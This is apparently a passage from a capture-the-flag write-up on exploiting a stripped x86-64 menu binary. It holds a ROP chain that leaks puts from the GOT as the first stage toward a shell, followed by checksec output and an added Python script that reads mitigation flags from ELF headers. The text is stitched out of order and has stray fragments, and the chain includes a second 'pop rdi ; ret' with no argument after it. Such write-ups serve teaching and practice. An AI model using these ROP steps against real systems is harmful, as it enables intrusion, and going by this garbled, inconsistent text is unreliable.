We build the first ROP payload, which leaks the `puts` address:

```
[padding (72)]
pop rdi ; ret -> address: 0x4014b3
<puts@got address> -> 0x601028 (found via `readelf -r` or `objdump -R`)
puts@plt -> 0x400670
pop rdi ; ret -> 0x4014b3 (to set up argument for next read)
<main> -> 0x4011f0 (restart the menu)
```
Explanation:
- `pop rdi ; ret` → loads the address of `puts` from the GOT into RDI (first argument to `puts`).
- `puts@plt` → prints the real address of `puts` from libc.
- Return to `main` so we can send a second payload (the actual shell‑spawn).

midv699-full

- `midv699-full` (ELF 64‑bit, stripped)
- `libc.so.6` (the exact glibc version used on the remote host)

stdout as HTB...).

The binary is a simple interactive “menu” program that reads user input, performs a few checks, and then calls a vulnerable function. The source code is not provided, so we rely on reverse‑engineering.
```
$ file midv699-full
midv699-full: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, stripped
$ checksec --file=midv699-full
[*] RELRO : Partial RELRO
[*] Stack Canary : No canary found
[*] NX : Enabled
[*] PIE : No PIE
[*] Fortify Source : No
```
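Where the RELRO, NX, PIE and canary fields in the checksec output above come from in the ELF headers, shown as an added example (not part of the original write-up and not checksec's own code). The names `elf_mitigations` and `build_sample` are hypothetical, the sample image is constructed rather than the challenge binary, and the canary check is a simple string heuristic.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 24, 30, 0x6FFFFFFB
ET_DYN, PF_X, DF_BIND_NOW, DF_1_NOW = 3, 0x1, 0x8, 0x1

def elf_mitigations(data: bytes) -> dict:
    """Derive checksec-style fields from a little-endian ELF64 image."""
    if data[:6] != b"\x7fELF\x02\x01":
        raise ValueError("not a little-endian ELF64 file")
    e_type, _, _, _, e_phoff = struct.unpack_from("<HHIQQ", data, 16)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    relro = bind_now = nx = False
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:      # relocation data remapped read-only after startup
            relro = True
        elif p_type == PT_GNU_STACK:    # NX holds when the stack segment lacks PF_X
            nx = not (p_flags & PF_X)
        elif p_type == PT_DYNAMIC:      # eager binding is what lets RELRO cover the whole GOT
            for off in range(p_offset, p_offset + p_filesz, 16):
                tag, val = struct.unpack_from("<qQ", data, off)
                if tag == 0:            # DT_NULL ends the dynamic array
                    break
                if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                    bind_now = True
    return {
        "RELRO": ("Full" if relro and bind_now else "Partial" if relro else "No") + " RELRO",
        "NX": "Enabled" if nx else "Disabled",
        "PIE": "PIE enabled" if e_type == ET_DYN else "No PIE",  # ET_EXEC = fixed load address
        # Heuristic: a stack-protected binary imports __stack_chk_fail
        "Stack Canary": "Canary found" if b"__stack_chk_fail" in data else "No canary found",
    }

def build_sample(e_type=2, relro=True, now=False, stack_x=False) -> bytes:
    """Constructed headers-only ELF64 image; defaults mirror the output above."""
    phdrs = [(PT_GNU_STACK, 7 if stack_x else 6, 0, 0)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 4, 0, 0))
    dyn = (struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW) if now else b"") + bytes(16)
    phdrs.append((PT_DYNAMIC, 6, 64 + 56 * (len(phdrs) + 1), len(dyn)))
    ehdr = b"\x7fELF\x02\x01\x01" + bytes(9) + struct.pack(
        "<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, o, 0, 0, s, s, 8) for t, f, o, s in phdrs)
    return ehdr + body + dyn

if __name__ == "__main__":
    print(elf_mitigations(build_sample()))
```

For comparison, a GCC build with `-fstack-protector-strong -fPIE -pie -Wl,-z,relro,-z,now` would report a canary, PIE and Full RELRO.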
Key observations: